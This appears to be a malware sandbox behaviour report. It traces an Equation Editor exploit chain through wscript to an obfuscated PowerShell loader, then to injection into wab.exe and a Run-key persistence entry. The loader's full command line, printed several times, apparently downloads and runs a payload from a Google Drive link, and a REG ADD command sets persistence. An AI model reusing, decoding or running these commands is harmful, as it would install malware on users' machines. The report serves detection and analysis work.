Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599697
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 480060
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 119938
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 420140
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 119969
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 79783
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 80245
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 60268
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1800000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1800000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 80338
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 80422

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu

Source: powershell.exe, 00000007.00000002.476529578.00000000009C0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: *WsHGFs

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B8A6 mov edx, dword ptr fs:[00000030h]	2_2_0062B8A6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0B92 mov edx, dword ptr fs:[00000030h]	22_2_07DE0B92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0B41 mov edx, dword ptr fs:[00000030h]	22_2_07DE0B41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DCC mov eax, dword ptr fs:[00000030h]	22_2_07DE0DCC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DE0 mov ebx, dword ptr fs:[00000030h]	22_2_07DE0DE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DE0 mov ebx, dword ptr fs:[00000030h]	22_2_07DE0DE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DE0 mov ebx, dword ptr fs:[00000030h]	22_2_07DE0DE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DE0 mov ebx, dword ptr fs:[00000030h]	22_2_07DE0DE0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Code function: 24_2_005A2F5B GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

24_2_005A2F5B

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 24_2_005A2AC1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		24_2_005A2AC1
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 31_2_005B2AC1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		31_2_005B2AC1

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 16F0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 27FE1C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 1720000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2AF94C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 17A0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EFD4C

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu 